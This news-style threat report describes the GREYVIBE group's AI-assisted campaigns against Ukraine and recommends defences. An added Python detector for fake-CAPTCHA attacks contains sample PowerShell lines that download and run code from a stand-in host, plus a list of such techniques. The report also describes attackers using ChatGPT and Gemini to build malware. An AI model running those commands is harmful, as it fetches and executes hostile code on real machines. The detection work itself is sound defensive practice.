GREYVIBE Hackers Use AI to Boost Cyberattacks Against Ukraine, Researchers Report

GREYVIBE Hackers Exploit AI Tools to Enhance Cyberattacks

The GREYVIBE hacking group has been actively leveraging advanced artificial intelligence (AI) tools, notably ChatGPT and Google Gemini, to amplify their cyberattack capabilities. Since August 2025, this group has primarily targeted Ukrainian government, military, and civilian sectors, underscoring the increasing integration of AI in cyber warfare.

Identification and Attribution

WithSecure researchers have identified GREYVIBE as a previously untracked threat actor exhibiting consistent patterns in infrastructure, tools, and operational behavior across multiple campaigns. While definitive attribution remains elusive, the group’s activities align closely with Russian state interests, particularly in intelligence gathering related to the Russia-Ukraine conflict. Indicators supporting this alignment include Russian-language artifacts, activity patterns corresponding to Moscow’s time zone, and a focus on Ukrainian institutions.

Tactics and Techniques

GREYVIBE employs a multifaceted attack strategy that combines spear-phishing emails, deceptive CAPTCHA verification pages, and fraudulent websites to distribute malware.

– Spear-Phishing Campaigns: Attackers impersonate Ukrainian government agencies, distributing malicious archives via cloud services like Google Drive. These payloads execute decoy documents while silently initiating infection chains using custom loaders.

– Fake CAPTCHA Pages: Designed to deceive victims into executing malicious commands under the guise of verification steps.

– Deceptive Websites: The group operates fraudulent adult club websites targeting Ukrainian individuals, particularly military personnel. These platforms deliver malware such as FallSpy for Android and PhantomRelay for Windows and engage in social engineering through fake personas on messaging platforms like Telegram.
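The fake CAPTCHA vector described above leaves a recognisable trace in endpoint telemetry: a command interpreter launched from a browser or from the Windows Run dialog (hosted by explorer.exe) with download or decode arguments. The following is an added example of a scoring detector over such process-creation events; it is not code from the WithSecure report or from GREYVIBE's toolset, and the log format, field names and event lines are constructed for illustration.

```python
"""Score process-creation events for a fake-CAPTCHA ("paste and run") pattern.

Added example, not from the original report. The log format below
(key=value fields with a quoted cmdline) and all sample events are
constructed; adapt parse_event() to your own EDR or Sysmon export.
"""
import shlex

# Parents that a verification page can plausibly drive: browsers and the
# Run dialog, which is hosted by explorer.exe. Browser-parented shells
# score higher because fewer legitimate workflows produce them.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
RUN_DIALOG_HOSTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Substrings (matched case-insensitively) typical of a pasted one-liner
# that fetches and executes a second stage.
SUSPICIOUS_TOKENS = ("-enc", "iex", "invoke-expression", "downloadstring",
                     "frombase64string", "http://", "https://", "-w hidden")

FLAG_THRESHOLD = 2

# Constructed sample events: two lure executions, three benign events.
SAMPLE_EVENTS = [
    'ts=2025-09-01T08:02:11Z parent=chrome.exe image=powershell.exe '
    'cmdline="powershell -w hidden -enc SQBFAFgAIAAoAC4ALgAuACkA"',
    'ts=2025-09-01T08:03:40Z parent=explorer.exe image=powershell.exe '
    'cmdline="powershell -nop -c iex ((New-Object Net.WebClient)'
    '.DownloadString(\'https://verify.example.invalid/c\'))"',
    'ts=2025-09-01T08:05:02Z parent=code.exe image=powershell.exe '
    'cmdline="powershell -File build.ps1"',
    'ts=2025-09-01T08:06:30Z parent=msedge.exe image=notepad.exe cmdline="notepad.exe"',
    'ts=2025-09-01T08:07:15Z parent=explorer.exe image=cmd.exe cmdline="cmd /c dir"',
]


def parse_event(line: str) -> dict:
    """Split a key=value line into a dict; shlex keeps the quoted cmdline whole."""
    event = {}
    for token in shlex.split(line):
        key, _, value = token.partition("=")
        event[key] = value
    return event


def score_event(event: dict) -> int:
    """Return a suspicion score; 0 for anything that is not an interpreter."""
    image = event.get("image", "").lower()
    if image not in INTERPRETERS:
        return 0
    parent = event.get("parent", "").lower()
    score = 0
    if parent in BROWSERS:
        score += 2
    elif parent in RUN_DIALOG_HOSTS:
        score += 1
    cmdline = event.get("cmdline", "").lower()
    score += sum(1 for tok in SUSPICIOUS_TOKENS if tok in cmdline)
    return score


def find_lure_candidates(lines) -> list:
    """Return (timestamp, score) for events at or above FLAG_THRESHOLD."""
    hits = []
    for line in lines:
        event = parse_event(line)
        score = score_event(event)
        if score >= FLAG_THRESHOLD:
            hits.append((event.get("ts", ""), score))
    return hits


if __name__ == "__main__":
    for ts, score in find_lure_candidates(SAMPLE_EVENTS):
        print(f"{ts} score={score}")
```

The score is deliberately graded rather than binary: a shell spawned under explorer.exe with a plain `dir` (the last sample) stays below the threshold, while the same parent combined with an in-memory download-and-execute one-liner is flagged. Tune the token list and threshold against your own baseline of browser- and Run-dialog-spawned interpreters before alerting on it.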

Integration of AI Tools

A significant aspect of GREYVIBE’s operations is the systematic use of generative AI tools across the attack lifecycle. Tools like ChatGPT, Google Gemini, and Ideogram AI have been utilized to generate phishing lures, develop malware components, and support post-compromise activities.

– AI-Generated Code: Researchers observed AI-generated code patterns in obfuscators and loaders such as DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell-based remote access trojan.

– Operational Efficiency: This AI-assisted approach enables the group to compensate for limited technical sophistication while accelerating development cycles. It also reduces reliance on reused code, complicating traditional attribution methods.

Challenges and Vulnerabilities

Despite the advantages, GREYVIBE’s reliance on AI has introduced certain flaws. WithSecure identified design weaknesses in LegionRelay that exposed backend functionality, allowing researchers to monitor attacker activity over time.

Malware Toolkit

GREYVIBE’s malware arsenal includes:

– PhantomRelay: A modular remote access trojan (RAT) that uses WebSockets for command execution.

– FallSpy: An Android malware variant used to compromise mobile devices.

Implications and Recommendations

The integration of AI tools in cyberattacks by groups like GREYVIBE signifies a paradigm shift in cyber warfare tactics. Organizations, especially those in high-risk sectors, must enhance their cybersecurity measures to counteract these sophisticated threats.

– Enhanced Monitoring: Implement monitoring that can detect the delivery patterns described here, such as malicious archives fetched from cloud-sharing links and commands launched from fake verification pages, rather than relying on signatures for individual samples.

– Employee Training: Conduct regular training sessions to educate employees about the latest phishing tactics and social engineering methods.

– AI Security Measures: Because AI-generated tooling reduces code reuse and weakens sample-based attribution, develop detection and tracking that keys on behavior, infrastructure, and operational patterns rather than on code similarity alone.

By understanding and addressing the evolving tactics of threat actors like GREYVIBE, organizations can better protect themselves against the next generation of cyber threats.